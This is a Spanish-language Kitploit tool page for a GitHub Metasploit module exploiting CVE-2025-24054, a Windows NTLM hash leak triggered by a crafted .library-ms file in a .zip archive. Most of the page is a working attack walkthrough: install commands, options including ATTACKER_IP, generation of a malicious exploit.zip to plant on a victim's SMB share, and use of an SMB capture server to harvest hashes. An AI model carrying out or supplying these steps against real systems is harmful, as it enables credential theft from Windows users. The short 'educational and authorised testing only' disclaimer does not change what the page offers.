Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-24054-24071---Metasploit-Module — Metasploit module to exploit CVE-2025-24054 (formerly 24071). NTLM leak exploit integrated into Metasploit for attack vectors based on Windows libraries. | Kitploit
Herramientas/GitHubGitHub/securitylayer404/cve-2025-24054-24071---metasploit-module
Frameworks de ExploitsGeneración de PayloadsExplotaciónPruebas de PenetraciónAprendizaje y EducaciónRed Teaming
GitHubsecuritylayer404/cve-2025-24054-24071---metasploit-module

CVE-2025-24054-24071---Metasploit-Module

Metasploit module to exploit CVE-2025-24054 (formerly 24071). NTLM leak exploit integrated into Metasploit for attack vectors based on Windows libraries.

Ver Repositorio
1hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-24054/24071 - Metasploit Module

Overview

La vulnerabilidad ocurre durante el proceso de extracción de un archivo .zip Al interactuar con un archivo .library-ms especialmente diseñado, el Explorador de Windows procesa el esquema XML interno e inicia automáticamente una solicitud de autenticación SMB hacia una ruta remota controlada por el atacante.

Este comportamiento permite la exfiltración del hash NTLM del usuario sin requerir interacción adicional más allá de la descompresión del archivo. Para ver una prueba de concepto te recomiendo visitar el siguiente link: Fluffy - HTB.

⚠️ Nota crítica:

Aunque originalmente esta vulnerabilidad fue difundida como CVE-2025-24071, actualmente se rastrea oficialmente como CVE-2025-24054.

📌 Instalación

Clonar el repositorio:

root@kitploit:~
❯ git clone https://github.com/SecurityLayer404/CVE-2025-24054-24071---Metasploit-Module.git
❯ cd CVE-2025-24071

Copiar el módulo al directorio de Metasploit:

root@kitploit:~
❯ cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/

Si el directorio no existe, crealo con:

root@kitploit:~
❯ mkdir -p ~/.msf4/modules/auxiliary/server/

Luego copiar nuevamente el módulo.

📌 Uso

Iniciar Metasploit y cargar el módulo:

root@kitploit:~
❯ msfconsole -q
❯ use auxiliary/server/ntlm_hash_leak

Si el modulo cargo correctamente podras ver las opciones para configurarlo:

root@kitploit:~
❯ show options

Module options (auxiliary/server/ntlm_hash_leak):

   Name          Current Setting       Required  Description

   ----          ---------------       --------  -----------

   ATTACKER_IP                         yes       IP del atacante (donde corre Responder/Impacket)

   FILENAME      exploit.zip           yes       El nombre del archivo ZIP

   LIBRARY_NAME  documents.library-ms  yes       Nombre del archivo .library-ms

   SHARE_NAME    recurso               yes       Nombre del recurso compartido ficticio

Configura el modulo y ejecuta:

root@kitploit:~
❯ set ATTACKER_IP 0.0.0.0  # Reemplaza con tu IP atacante

❯ set FILENAME exploit.zip  # Nombre del payload que subiras al SMB (equipo objetivo)

❯ set LIBRARY_NAME malicious.library-ms  # Nombre de .library-ms file

❯ set SHARE_NAME it_shared  # Nombre del recurso SMB

❯ run

Output: el módulo genera un archivo .zip que debe ser subido al servidor SMB objetivo para su posterior ejecución por parte de la víctima

root@kitploit:~
[+] exploit.zip stored at /home/user/.msf4/local/exploit.zip
[+] Archivo guardado en: /home/user/.msf4/local/exploit.zip
[*] Auxiliary module execution completed

Por ultimo utilice el módulo de captura SMB de Metasploit para recibir los hashes NTLM:

root@kitploit:~
❯ use auxiliary/server/capture/smb
❯ set SRVHOST 0.0.0.0  # Reemplaza con tu IP atacante
❯ run

Si tienes problemas para levantar el servidor SMB desde Metasploit:

  • Ejecuta msfconsole como root
  • Asegúrate de que el archivo ntlm_hash_leak.rb tenga los permisos adecuados para ser accedido por root

⚠️ Advertencia

Este módulo fue desarrollado con fines educativos y de pruebas autorizadas únicamente. El uso no autorizado de este tipo de herramientas puede ser ilegal.

🕷 Autor

Security Layer

Descargar herramienta